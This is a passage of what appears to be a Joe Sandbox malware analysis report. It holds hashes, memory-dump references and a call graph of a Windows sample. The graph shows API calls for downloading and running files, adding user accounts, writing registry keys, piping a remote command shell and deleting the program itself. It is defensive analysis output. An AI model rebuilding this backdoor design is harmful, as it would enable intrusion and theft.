                                                • Opcode Fuzzy Hash: a632be034871403156b450a25cdca945fc9fc0e45cc40d53e5baa05df5269853
                                                • Instruction Fuzzy Hash: 0531BDB4D012189FDF10CFA9D984A9EFBB1FF49310F24942AE815B7200D775A945CF54
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e27ebdf4a25de35ccee07be5d6565244b7ecdde32be09dce42f4f9c294b2bc7
                                                • Instruction ID: 84cedc40b15f1c83db7b2fe7e75e11dacfec0d74c06019cef7c46d851a35fc1e
                                                • Opcode Fuzzy Hash: 0e27ebdf4a25de35ccee07be5d6565244b7ecdde32be09dce42f4f9c294b2bc7
                                                • Instruction Fuzzy Hash: 5A429178E01229CFDB54CFA9C984B9DBBB2BF49310F1581A9D809A7365D734AE81CF50
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae54cd9a540d313bcc6cb4f8b897eddada8e9236465cd8c4d44821182d520e66
                                                • Instruction ID: f28c0f851f9725cdc9fa8946382080d92651d7d3e632f06db6731d8dcc88e917
                                                • Opcode Fuzzy Hash: ae54cd9a540d313bcc6cb4f8b897eddada8e9236465cd8c4d44821182d520e66
                                                • Instruction Fuzzy Hash: A161B674E00208DFDB58DFA9D995A9DBBF2FF89300F24806AE415AB365DB30A901CF10

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to VirtualAllocEx)
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001A6532
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: a171e110de1326d6678a2680f02e872c4dcee5fca9fe1ac88ecdd7d747a6fd01
                                                • Instruction ID: 5cc2bc374fb44f1d27c416ef68810fa1d87f58a88a5d236c2fee16da39f33703
                                                • Opcode Fuzzy Hash: a171e110de1326d6678a2680f02e872c4dcee5fca9fe1ac88ecdd7d747a6fd01
                                                • Instruction Fuzzy Hash: DC3198B9D002589FDF10CFA9D884AEEFBB1BF49310F24942AE815B7250D735AA06CF54

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to VirtualAllocEx)
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001A6532
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 4e2cb4e2d9b79e87c6e25758baad7116c9aaad6e9dfa972fe123e9a2a666d390
                                                • Instruction ID: 730de16a1fa88b960194bb670e357d7f2d9cdfd3cac7017274cc7855167f95e1
                                                • Opcode Fuzzy Hash: 4e2cb4e2d9b79e87c6e25758baad7116c9aaad6e9dfa972fe123e9a2a666d390
                                                • Instruction Fuzzy Hash: 8B31AAB9D002589FCF10CFA9D884AEEFBB1BF49310F24942AE815B7210D735A906CF54
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3edadc241ef7a4dc02506429a0f08e584ff64e155ca871610a295d59517f38c7
                                                • Instruction ID: 28daacf59749a61638bbb3cfcc4aed5d87b9d39fabe71ee8e2e8d323e6a72d99
                                                • Opcode Fuzzy Hash: 3edadc241ef7a4dc02506429a0f08e584ff64e155ca871610a295d59517f38c7
                                                • Instruction Fuzzy Hash: B7B1C874E002198FDB14DFA9C991A9DFBF2BF89300F24C16AE419AB355DB34A942CF50
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4beed6a3329e38cd9f1ad3b1051500c46fe8738f764557dd3f7f643c1a0c5c40
                                                • Instruction ID: 49a8175033c19eb6e8ec5c413f49036f4cd40021d383463fe983e302591333de
                                                • Opcode Fuzzy Hash: 4beed6a3329e38cd9f1ad3b1051500c46fe8738f764557dd3f7f643c1a0c5c40
                                                • Instruction Fuzzy Hash: 0791C874E002188FDB54CFA9C985A9DFBF2BF89300F24C16AE419AB355DB34A942CF50

                                                Execution Graph

                                                Execution Coverage:9.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:6%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:62
LoadLibraryA 10662->11786 11752 41168e 10663->11752 10668 404b91 3 API calls 10664->10668 10671 40e6e3 10668->10671 10669 40e567 10669->10664 10672 40e56f 10669->10672 10670 403437 3 API calls 10673 40e47d 10670->10673 10674 404f2b 15 API calls 10671->10674 10675 40fbfc 4 API calls 10672->10675 11770 405ea5 VirtualFree 10673->11770 10677 40e6eb 10674->10677 10679 40e574 10675->10679 10678 404b6e VirtualFree 10677->10678 10681 40e6f3 LeaveCriticalSection 10678->10681 10682 40e5a4 10679->10682 10683 40e579 10679->10683 10680 40e485 11771 405ea5 VirtualFree 10680->11771 10687 40e6fc 10681->10687 10688 4034a7 21 API calls 10682->10688 10685 404b91 3 API calls 10683->10685 10689 40e58d 10685->10689 10686 40e492 10690 4035e5 4 API calls 10686->10690 10687->10322 10691 40e5af 10688->10691 10692 404f2b 15 API calls 10689->10692 10693 40e49f 10690->10693 10694 403437 3 API calls 10691->10694 10695 40e595 10692->10695 10696 41168e 22 API calls 10693->10696 10697 40e5ba 10694->10697 10698 404b6e VirtualFree 10695->10698 10699 40e4ab 10696->10699 11789 405ea5 VirtualFree 10697->11789 10762 40e52a 10698->10762 10701 403437 3 API calls 10699->10701 10704 40e4b8 10701->10704 10702 40e5c2 10705 4034a7 21 API calls 10702->10705 10703 40e658 LeaveCriticalSection 10703->10687 11772 405ea5 VirtualFree 10704->11772 10707 40e5cd 10705->10707 10709 403437 3 API calls 10707->10709 10708 40e4c0 11773 405ea5 VirtualFree 10708->11773 10710 40e5da 10709->10710 11790 405ea5 VirtualFree 10710->11790 10713 40e4cb 10715 403261 lstrlenW 10713->10715 10714 40e5e2 RegCreateKeyExA RegSetValueExW RegCloseKey 11791 40d418 NetUserAdd 10714->11791 10717 40e4d5 10715->10717 10719 40e52c 10717->10719 10723 403261 lstrlenW 10717->10723 10720 404b91 3 API calls 10719->10720 10724 40e53c 10720->10724 10721 40e638 10725 404b91 3 API calls 10721->10725 10722 40e66b 10726 4035e5 4 API calls 10722->10726 10727 40e4e0 10723->10727 10729 404f2b 15 API calls 10724->10729 10730 40e648 10725->10730 10731 40e67d 
10726->10731 10727->10719 10728 40e4e4 10727->10728 10732 4035e5 4 API calls 10728->10732 10733 40e544 10729->10733 10734 404f2b 15 API calls 10730->10734 11797 41165b 10731->11797 10737 40e4f2 10732->10737 10738 404b6e VirtualFree 10733->10738 10739 40e650 10734->10739 10741 4035e5 4 API calls 10737->10741 10738->10762 10742 404b6e VirtualFree 10739->10742 10744 40e4fc 10741->10744 10742->10703 10743 40e690 10745 4035e5 4 API calls 10743->10745 11774 404b91 10744->11774 10747 40e69e 10745->10747 10749 41165b 8 API calls 10747->10749 10751 40e6a6 10749->10751 10750 404f2b 15 API calls 10752 40e50f 10750->10752 11806 405ea5 VirtualFree 10751->11806 11779 404b6e 10752->11779 10755 40e6ae 11807 401f4b CreateThread 10755->11807 10759 40e6c3 LeaveCriticalSection 10759->10687 10760 40e51f 11785 405ea5 VirtualFree 10760->11785 10762->10703 10764 4098da 10763->10764 10765 4098ff LeaveCriticalSection 10763->10765 10766 401f76 2 API calls 10764->10766 10765->10322 10767 4098e4 10766->10767 11827 401f4b CreateThread 10767->11827 10770 409965 10769->10770 10771 40997c 10769->10771 11828 401f4b CreateThread 10770->11828 10773 401f76 2 API calls 10771->10773 10775 409981 10773->10775 10774 409970 10776 40999b LeaveCriticalSection 10774->10776 11829 401f4b CreateThread 10775->11829 10776->10322 10779 40f76b 5 API calls 10778->10779 10780 4027e9 10779->10780 10781 4034a7 21 API calls 10780->10781 10782 4027f4 10781->10782 10783 40346a 9 API calls 10782->10783 10784 402803 10783->10784 10785 403335 5 API calls 10784->10785 10786 40280b 10785->10786 11830 405ea5 VirtualFree 10786->11830 10788 402813 10789 40362d 3 API calls 10788->10789 10790 402822 10789->10790 11831 40351d 10790->11831 10793 403335 5 API calls 10794 402837 10793->10794 11836 405ea5 VirtualFree 10794->11836 10796 40283f 11837 405ea5 VirtualFree 10796->11837 10798 40284b 10799 40362d 3 API calls 10798->10799 10800 402857 URLDownloadToFileW 10799->10800 11838 405ea5 VirtualFree 10800->11838 10802 402870 10803 402874 
10802->10803 10804 40287d ShellExecuteW 10802->10804 10805 404f2b 15 API calls 10803->10805 10804->10803 10806 4028b1 10805->10806 11839 405ea5 VirtualFree 10806->11839 10808 4028b9 10808->10310 10810 405c6d 3 API calls 10809->10810 10811 4026e4 10810->10811 10812 403554 11 API calls 10811->10812 10813 4026eb 10812->10813 11840 405ea5 VirtualFree 10813->11840 10815 4026f3 inet_addr 10816 402701 getaddrinfo 10815->10816 10817 402739 10815->10817 10816->10817 11841 413de9 10817->11841 10821 40274a 10821->10335 10823 40362d 3 API calls 10822->10823 10824 402b99 10823->10824 10825 40ff27 17 API calls 10824->10825 10826 402ba1 10825->10826 10827 401361 12 API calls 10826->10827 10828 402baf 10827->10828 10829 40362d 3 API calls 10828->10829 10830 402bb8 10829->10830 11849 403bbb 10830->11849 10833 404f2b 15 API calls 10834 402bcb 10833->10834 11860 403b8b 10834->11860 10837 402be0 10837->10322 10838 401ad5 VirtualFree 10838->10837 10840 40304c 2 API calls 10839->10840 10841 4025e9 10840->10841 11874 411e8c VirtualAlloc 10841->11874 10843 4025f6 10844 402612 10843->10844 10845 402619 10843->10845 11877 407af1 10844->11877 11896 4079e8 10845->11896 10848 40261e VirtualFree 10850 403036 2 API calls 10848->10850 10851 402634 10850->10851 10851->10322 10853 404f2b 15 API calls 10852->10853 10854 40264e 10853->10854 10854->10322 10856 402683 10855->10856 10857 40265c 10855->10857 10856->10322 10858 40362d 3 API calls 10857->10858 10859 402668 ShellExecuteW 10858->10859 11981 405ea5 VirtualFree 10859->11981 10862 405c6d 3 API calls 10861->10862 10863 4026a1 10862->10863 10864 403554 11 API calls 10863->10864 10865 4026a8 10864->10865 11982 40ee22 10865->11982 10869 4026b8 11986 405ea5 VirtualFree 10869->11986 10871 4026c0 10871->10316 10873 404f2b 15 API calls 10872->10873 10874 402981 10873->10874 12068 4132ed 10874->12068 10878 41171c 10877->10878 12072 410f31 RegDeleteKeyW 10878->12072 10880 411732 10881 411746 10880->10881 10882 411739 TerminateThread 10880->10882 10883 
411788 10881->10883 10884 41106c 5 API calls 10881->10884 10882->10881 10885 411794 GetModuleFileNameA 10883->10885 10886 411762 10884->10886 10894 4117c6 10885->10894 10887 40362d 3 API calls 10886->10887 10888 41176e 10887->10888 12073 410f4c 10888->12073 10892 411781 10893 410fae RegCloseKey 10892->10893 10893->10883 10895 41181a CreateProcessA CloseHandle CloseHandle ExitProcess 10894->10895 10935 401875 10896->10935 10899 410004 10900 401361 12 API calls 10899->10900 10901 41000f 10900->10901 10903 41001c 10901->10903 10904 401ad5 VirtualFree 10901->10904 10902 4035e5 4 API calls 10911 40ff64 10902->10911 10952 405ea5 VirtualFree 10903->10952 10904->10903 10906 403437 3 API calls 10906->10911 10907 402c11 10914 401361 10907->10914 10909 40362d 3 API calls 10909->10911 10911->10899 10911->10902 10911->10906 10911->10909 10938 405ea5 VirtualFree 10911->10938 10939 401776 10911->10939 10951 405ea5 VirtualFree 10911->10951 10913 40ffee FindNextFileW 10913->10911 10915 401875 2 API calls 10914->10915 10916 40137c 10915->10916 10917 40139f 10916->10917 10919 401776 6 API calls 10916->10919 10956 4018c2 10916->10956 10920 404450 10917->10920 10919->10916 10921 401361 12 API calls 10920->10921 10922 404468 10921->10922 10923 402c27 10922->10923 10924 401ad5 VirtualFree 10922->10924 10925 404f2b 10923->10925 10924->10923 10926 404f40 10925->10926 10961 4055a5 10926->10961 10929 403036 2 API calls 10930 402c2f 10929->10930 10931 40442d 10930->10931 10932 402c37 10931->10932 10933 40443d 10931->10933 10932->10405 10932->10406 10934 401ad5 VirtualFree 10933->10934 10934->10932 10953 405f53 GetProcessHeap HeapAlloc 10935->10953 10937 40189e FindFirstFileW 10937->10911 10938->10911 10940 40178d 10939->10940 10941 401837 10939->10941 10954 405f53 GetProcessHeap HeapAlloc 10940->10954 10943 403437 3 API calls 10941->10943 10944 401851 10943->10944 10955 405ea5 VirtualFree 10944->10955 10946 4017b6 10949 403437 3 API calls 10946->10949 10950 401825 10946->10950 10947 40186e 
10947->10911 10948 401ad5 VirtualFree 10948->10941 10949->10946 10950->10941 10950->10948 10951->10913 10952->10907 10953->10937 10954->10946 10955->10947 10957 405ca3 3 API calls 10956->10957 10958 4018d8 10957->10958 10959 40362d 3 API calls 10958->10959 10960 4018e8 10959->10960 10960->10916 10962 404f49 10961->10962 10963 4055ba 10961->10963 10962->10929 10964 4033bf 4 API calls 10963->10964 10965 4055c7 10964->10965 10966 403003 7 API calls 10965->10966 10967 4055d0 10966->10967 10979 405ea5 VirtualFree 10967->10979 10969 4055d8 10970 40304c 2 API calls 10969->10970 10971 4055e5 10970->10971 10972 40304c 2 API calls 10971->10972 10973 4055f2 10972->10973 10974 4060aa 4 API calls 10973->10974 10975 4055fa send 10974->10975 10976 403036 2 API calls 10975->10976 10977 40561e 10976->10977 10978 403036 2 API calls 10977->10978 10978->10962 10979->10969 11021 405f53 GetProcessHeap HeapAlloc 10980->11021 10982 410043 11022 4019f6 10982->11022 10985 410070 11025 405f53 GetProcessHeap HeapAlloc 10985->11025 10987 410083 GetLogicalDriveStringsW 10993 41008d 10987->10993 10988 4035e5 4 API calls 10988->10993 10989 4013a8 12 API calls 10990 410111 10989->10990 10992 41011e 10990->10992 10994 401b00 VirtualFree 10990->10994 10991 403437 3 API calls 10991->10993 10992->10409 10993->10988 10993->10991 10999 403261 lstrlenW 10993->10999 11001 410103 10993->11001 11026 405ea5 VirtualFree 10993->11026 11027 401903 10993->11027 11039 405ea5 VirtualFree 10993->11039 10994->10992 10996 4100b1 GetDriveTypeW 10997 40362d 3 API calls 10996->10997 10997->10993 10999->10993 11001->10989 11003 4019f6 2 API calls 11002->11003 11004 4013c3 11003->11004 11005 4013e6 11004->11005 11007 401903 6 API calls 11004->11007 11043 401a43 11004->11043 11008 40453e 11005->11008 11007->11004 11009 4013a8 12 API calls 11008->11009 11011 404556 11009->11011 11010 402c6e 11010->10414 11011->11010 11012 401b00 VirtualFree 11011->11012 11012->11010 11014 402c7e 11013->11014 11015 40452b 11013->11015 
11014->10418 11017 401b00 11014->11017 11016 401b00 VirtualFree 11015->11016 11016->11014 11018 401b23 11017->11018 11020 401b11 11017->11020 11018->10418 11020->11018 11048 405ea5 VirtualFree 11020->11048 11021->10982 11040 405f53 GetProcessHeap HeapAlloc 11022->11040 11024 401a1f GetLogicalDriveStringsW 11024->10985 11024->10993 11025->10987 11026->10996 11028 4019be 11027->11028 11029 40191a 11027->11029 11031 403437 3 API calls 11028->11031 11041 405f53 GetProcessHeap HeapAlloc 11029->11041 11032 4019d8 11031->11032 11042 405ea5 VirtualFree 11032->11042 11034 401943 11036 403437 3 API calls 11034->11036 11038 4019ac 11034->11038 11035 4019ef 11035->10993 11036->11034 11037 401b00 VirtualFree 11037->11028 11038->11028 11038->11037 11039->10993 11040->11024 11041->11034 11042->11035 11044 405ca3 3 API calls 11043->11044 11045 401a59 11044->11045 11046 40362d 3 API calls 11045->11046 11047 401a69 11046->11047 11047->11004 11048->11020 11050 410d46 11049->11050 11097 4016e3 11050->11097 11052 410d67 CreateToolhelp32Snapshot 11053 410d7b Process32FirstW 11052->11053 11054 410efd 11052->11054 11055 410d8d CloseHandle 11053->11055 11056 410dce 11053->11056 11057 40131a 12 API calls 11054->11057 11059 40131a 12 API calls 11055->11059 11060 4032ff 9 API calls 11056->11060 11058 410f08 11057->11058 11061 410dc9 11058->11061 11064 401416 VirtualFree 11058->11064 11062 410d9f 11059->11062 11063 410dec OpenProcess 11060->11063 11061->10422 11062->11061 11065 401416 VirtualFree 11062->11065 11072 410e09 11063->11072 11064->11058 11065->11062 11066 410e1c GetModuleFileNameExW 11066->11072 11067 4035e5 lstrlenW lstrlenW lstrcpyW VirtualAlloc 11067->11072 11068 405ea5 VirtualFree 11068->11072 11069 403437 lstrlenW lstrcpyW VirtualAlloc 11069->11072 11070 410e80 CloseHandle 11070->11072 11071 40362d lstrlenW lstrcpyW VirtualAlloc 11071->11072 11072->11066 11072->11067 11072->11068 11072->11069 11072->11070 11072->11071 11074 401416 VirtualFree 11072->11074 11100 4015c0 
11072->11100 11075 410edd Process32NextW 11074->11075 11075->11056 11076 410ef6 CloseHandle 11075->11076 11076->11054 11078 4016e3 2 API calls 11077->11078 11080 401335 11078->11080 11079 401358 11083 404660 11079->11083 11080->11079 11082 4015c0 6 API calls 11080->11082 11116 401735 11080->11116 11082->11080 11084 40131a 12 API calls 11083->11084 11087 404678 11084->11087 11085 402cb6 11085->10427 11086 401416 VirtualFree 11086->11087 11087->11085 11087->11086 11089 404651 11088->11089 11090 404634 11088->11090 11089->10432 11090->11089 11091 401416 VirtualFree 11090->11091 11091->11090 11123 405ea5 VirtualFree 11092->11123 11094 401421 11124 405ea5 VirtualFree 11094->11124 11096 40142d 11096->10432 11114 405f53 GetProcessHeap HeapAlloc 11097->11114 11099 40170c 11099->11052 11099->11099 11101 4015d7 11100->11101 11113 40169c 11100->11113 11115 405f53 GetProcessHeap HeapAlloc 11101->11115 11103 403437 3 API calls 11104 4016c3 11103->11104 11105 403437 3 API calls 11104->11105 11106 4016d1 11105->11106 11108 401416 VirtualFree 11106->11108 11107 401600 11109 403437 lstrlenW lstrcpyW VirtualAlloc 11107->11109 11111 401676 11107->11111 11110 4016dc 11108->11110 11109->11107 11110->11072 11112 401416 VirtualFree 11111->11112 11111->11113 11112->11111 11113->11103 11114->11099 11115->11107 11117 405ca3 3 API calls 11116->11117 11118 40174a 11117->11118 11119 40362d 3 API calls 11118->11119 11120 401762 11119->11120 11121 40362d 3 API calls 11120->11121 11122 40176e 11121->11122 11122->11080 11123->11094 11124->11096 11126 40f97d 11125->11126 11207 401085 GetProcessHeap RtlAllocateHeap 11126->11207 11128 40f9e4 11129 4033bf 4 API calls 11128->11129 11130 40fa02 11129->11130 11131 40309d 10 API calls 11130->11131 11132 40fa09 11131->11132 11208 405ea5 VirtualFree 11132->11208 11134 40fa11 11209 401099 GetProcessHeap HeapFree 11134->11209 11136 402d04 11137 40f80e CoInitializeSecurity CoInitialize 11136->11137 11138 40f836 CoCreateInstance 11137->11138 11140 40f877 
11137->11140 11138->11140 11141 40f854 11138->11141 11139 4035e5 4 API calls 11143 402d0c GetModuleFileNameA 11139->11143 11140->11139 11141->11140 11142 40f8ca VariantInit 11141->11142 11141->11143 11142->11141 11143->10438 11144->10445 11146 4035e5 4 API calls 11145->11146 11147 402d7f 11146->11147 11147->10450 11149 40fa64 GetProcAddress 11148->11149 11150 402d90 11148->11150 11149->11150 11151 40fcb8 11150->11151 11152 40fcde 11151->11152 11175 40fd58 11151->11175 11153 4035e5 4 API calls 11152->11153 11154 40fceb RegOpenKeyExW 11153->11154 11210 405ea5 VirtualFree 11154->11210 11155 402e93 2 API calls 11157 40fd6c 11155->11157 11159 403036 2 API calls 11157->11159 11158 40fd0e 11160 40fd3d 11158->11160 11163 4035e5 4 API calls 11158->11163 11161 40fd74 11159->11161 11212 40607a 11160->11212 11164 410fae RegCloseKey 11161->11164 11167 40fd24 11163->11167 11165 402d9f 11164->11165 11177 404241 11165->11177 11169 410fc3 12 API calls 11167->11169 11168 402e93 2 API calls 11170 40fd50 11168->11170 11171 40fd2d 11169->11171 11172 403036 2 API calls 11170->11172 11211 405ea5 VirtualFree 11171->11211 11172->11175 11174 40fd35 11176 410fae RegCloseKey 11174->11176 11175->11155 11176->11160 11178 40304c 2 API calls 11177->11178 11179 404259 11178->11179 11180 40362d 3 API calls 11179->11180 11181 40427d 11180->11181 11182 40362d 3 API calls 11181->11182 11183 404289 11182->11183 11184 40362d 3 API calls 11183->11184 11185 4042a1 11184->11185 11186 40362d 3 API calls 11185->11186 11187 4042ad 11186->11187 11188 403036 2 API calls 11187->11188 11189 4042b5 11188->11189 11216 405ea5 VirtualFree 11189->11216 11191 4042bd 11217 405ea5 VirtualFree 11191->11217 11193 4042c9 11218 405ea5 VirtualFree 11193->11218 11195 4042d5 11219 405ea5 VirtualFree 11195->11219 11207->11128 11208->11134 11209->11136 11210->11158 11211->11174 11213 406097 11212->11213 11214 402f91 6 API calls 11213->11214 11215 4060a5 11214->11215 11215->11168 11216->11191 11217->11193 11218->11195 11225 4012c9 
11224->11225 11226 4012b6 11224->11226 11230 4076c0 11225->11230 11251 405f53 GetProcessHeap HeapAlloc 11226->11251 11228 4012be 11228->11225 11252 4077ae 11228->11252 11259 401085 GetProcessHeap RtlAllocateHeap 11230->11259 11232 4076d7 11233 403437 3 API calls 11232->11233 11234 4076fb 11233->11234 11260 401085 GetProcessHeap RtlAllocateHeap 11234->11260 11236 407719 11237 40362d 3 API calls 11236->11237 11238 407725 11237->11238 11239 40362d 3 API calls 11238->11239 11240 40772e 11239->11240 11241 403261 lstrlenW 11240->11241 11242 407736 11241->11242 11261 405ea5 VirtualFree 11242->11261 11244 407752 11262 405ea5 VirtualFree 11244->11262 11246 40775a 11263 41026f WaitForSingleObject 11246->11263 11248 407774 CreateThread 11264 401e9c 11248->11264 11269 4073bb 11248->11269 11251->11228 11257 405f53 GetProcessHeap HeapAlloc 11252->11257 11254 4077c9 11258 410298 CreateMutexA 11254->11258 11256 4077dd 11256->11225 11257->11254 11258->11256 11259->11232 11260->11236 11261->11244 11262->11246 11263->11248 11265 401eb0 11264->11265 11267 401edc ReleaseMutex 11264->11267 11268 405f53 GetProcessHeap HeapAlloc 11265->11268 11267->10477 11268->11267 11270 4035e5 4 API calls 11269->11270 11271 4073e0 11270->11271 11303 4078b0 11271->11303 11274 4074e3 PathFindFileNameW 11275 4035e5 4 API calls 11274->11275 11277 407510 11275->11277 11276 407549 11335 407574 11276->11335 11327 4040ea 11277->11327 11280 410125 CloseHandle 11280->11276 11283 407557 11357 4077e3 11283->11357 11284 404f2b 15 API calls 11289 407525 11284->11289 11285 407476 PathFindFileNameW 11288 4035e5 4 API calls 11285->11288 11286 407426 PathFindFileNameW 11290 4035e5 4 API calls 11286->11290 11301 4073f3 11288->11301 11332 404050 11289->11332 11290->11301 11292 403036 2 API calls 11294 407569 11292->11294 11295 4040ea lstrlenW lstrcpyW VirtualFree VirtualAlloc 11295->11301 11297 403036 2 API calls 11302 4074e1 11297->11302 11298 404f2b 15 API calls 11298->11301 11299 404050 VirtualFree 11299->11301 11300 
403036 GetProcessHeap HeapFree 11300->11301 11301->11285 11301->11286 11301->11295 11301->11298 11301->11299 11301->11300 11301->11302 11314 40783b 11301->11314 11302->11276 11302->11280 11365 405f53 GetProcessHeap HeapAlloc 11303->11365 11305 4078ce 11306 40fece CreateMutexA 11305->11306 11307 4078f5 11306->11307 11308 403437 3 API calls 11307->11308 11309 407909 11308->11309 11310 410192 2 API calls 11309->11310 11311 407917 11310->11311 11366 405ea5 VirtualFree 11311->11366 11313 4073e9 11313->11274 11313->11301 11315 407846 11314->11315 11320 407893 11314->11320 11316 407862 11315->11316 11317 40789a 11315->11317 11315->11320 11367 40fe3d 11316->11367 11318 40fe3d 12 API calls 11317->11318 11318->11320 11320->11301 11323 40787b 11324 402f91 6 API calls 11323->11324 11325 40788d 11324->11325 11380 401099 GetProcessHeap HeapFree 11325->11380 11328 40362d 3 API calls 11327->11328 11329 404108 11328->11329 11384 405ea5 VirtualFree 11329->11384 11331 404134 11331->11284 11385 405ea5 VirtualFree 11332->11385 11334 404061 11334->11297 11386 41026f WaitForSingleObject 11335->11386 11337 4075d8 11338 4075da ReleaseMutex 11337->11338 11338->11283 11339 405ca3 3 API calls 11340 40758f 11339->11340 11340->11337 11340->11339 11341 4075ee 11340->11341 11342 405ca3 3 API calls 11341->11342 11343 4075f8 11342->11343 11387 405ea5 VirtualFree 11343->11387 11345 407610 11346 405ca3 3 API calls 11345->11346 11347 407621 TerminateThread 11346->11347 11348 405ca3 3 API calls 11347->11348 11349 40764d 11348->11349 11349->11338 11350 4040ea 4 API calls 11349->11350 11351 4076a2 11350->11351 11352 404f2b 15 API calls 11351->11352 11353 4076ab 11352->11353 11354 404050 VirtualFree 11353->11354 11355 4076b3 11354->11355 11356 403036 2 API calls 11355->11356 11356->11337 11358 4077f4 11357->11358 11359 4077ec 11357->11359 11361 40feed 4 API calls 11358->11361 11360 410125 CloseHandle 11359->11360 11360->11358 11362 4077fc 11361->11362 11363 407560 11362->11363 11364 403036 2 API calls 
11362->11364 11363->11292 11364->11362 11365->11305 11366->11313 11368 40fe53 11367->11368 11369 40fe4b 11367->11369 11382 405eff GetProcessHeap RtlAllocateHeap 11368->11382 11381 41026f WaitForSingleObject 11369->11381 11372 40fe5f SetFilePointer ReadFile 11373 402f91 6 API calls 11372->11373 11374 40fe8f 11373->11374 11383 405eee GetProcessHeap HeapFree 11374->11383 11376 40fe96 11377 40786d 11376->11377 11378 40fe9c ReleaseMutex 11376->11378 11379 401085 GetProcessHeap RtlAllocateHeap 11377->11379 11378->11377 11379->11323 11380->11320 11381->11368 11382->11372 11383->11376 11384->11331 11385->11334 11386->11340 11387->11345 11388->10482 11389->10484 11391 40f76b 5 API calls 11390->11391 11392 40edcb 11391->11392 11393 40346a 9 API calls 11392->11393 11394 40edd8 11393->11394 11395 40362d 3 API calls 11394->11395 11396 40ede4 11395->11396 11435 40eafb 11396->11435 11398 40ede9 11472 405ea5 VirtualFree 11398->11472 11400 40edfb 11400->10499 11401->10491 11402->10493 11404 40ead4 11403->11404 11405 40ea95 GetCurrentThreadId 11403->11405 11406 40ec8c CloseHandle 11404->11406 11407 40eaa0 11405->11407 11408 40eacd 11405->11408 11409 40eadc 11406->11409 11410 40eaa6 SetEvent WaitForSingleObject 11407->11410 11418 40eaf4 11407->11418 11411 40ec8c CloseHandle 11408->11411 11412 40ec8c CloseHandle 11409->11412 11410->11408 11413 40eac3 TerminateThread 11410->11413 11411->11404 11414 40eae4 11412->11414 11413->11408 11415 40ec8c CloseHandle 11414->11415 11416 40eaec 11415->11416 11417 40ec8c CloseHandle 11416->11417 11417->11418 11418->10499 11420 402a97 11419->11420 11421 403407 11419->11421 11426 40ecd0 11420->11426 11422 403372 lstrlenA 11421->11422 11423 40340e 11422->11423 11520 405eb4 VirtualAlloc 11423->11520 11425 403415 lstrcpyA 11425->11420 11427 40ece2 11426->11427 11428 40ecde 11426->11428 11521 40315f 11427->11521 11528 405ea5 VirtualFree 11428->11528 11432 40ed18 11432->10499 11433 40308c lstrlenA 11434 40ed00 WriteFile 11433->11434 11434->11428 11436 
40ea89 5 API calls 11435->11436 11437 40eb0e CreatePipe 11436->11437 11438 40ec47 11437->11438 11439 40eb4f GetCurrentProcess GetCurrentProcess DuplicateHandle 11437->11439 11441 40ec8c CloseHandle 11438->11441 11439->11438 11440 40eb77 CreatePipe 11439->11440 11440->11438 11442 40eb93 GetCurrentProcess GetCurrentProcess DuplicateHandle 11440->11442 11443 40ec4f 11441->11443 11442->11438 11444 40ebb1 GetCurrentProcess GetCurrentProcess DuplicateHandle 11442->11444 11445 40ec8c CloseHandle 11443->11445 11444->11438 11446 40ebcb 11444->11446 11447 40ec57 11445->11447 11473 40ec8c 11446->11473 11449 40ec8c CloseHandle 11447->11449 11450 40ec5f 11449->11450 11452 40ec8c CloseHandle 11450->11452 11454 40ec67 11452->11454 11453 40ec8c CloseHandle 11455 40ebdb 11453->11455 11456 40ec8c CloseHandle 11454->11456 11457 40362d 3 API calls 11455->11457 11459 40ec6f 11456->11459 11458 40ebf0 11457->11458 11476 40e891 11458->11476 11461 40ea89 5 API calls 11459->11461 11463 40ec79 11461->11463 11482 405ea5 VirtualFree 11463->11482 11464 40ec8c CloseHandle 11466 40ec01 11464->11466 11468 40ec8c CloseHandle 11466->11468 11467 40ec83 11467->11398 11469 40ec09 11468->11469 11470 40ec8c CloseHandle 11469->11470 11471 40ec11 CreateEventA CreateThread 11470->11471 11471->11438 11471->11463 11484 40e92a 11471->11484 11472->11400 11474 40ec94 CloseHandle 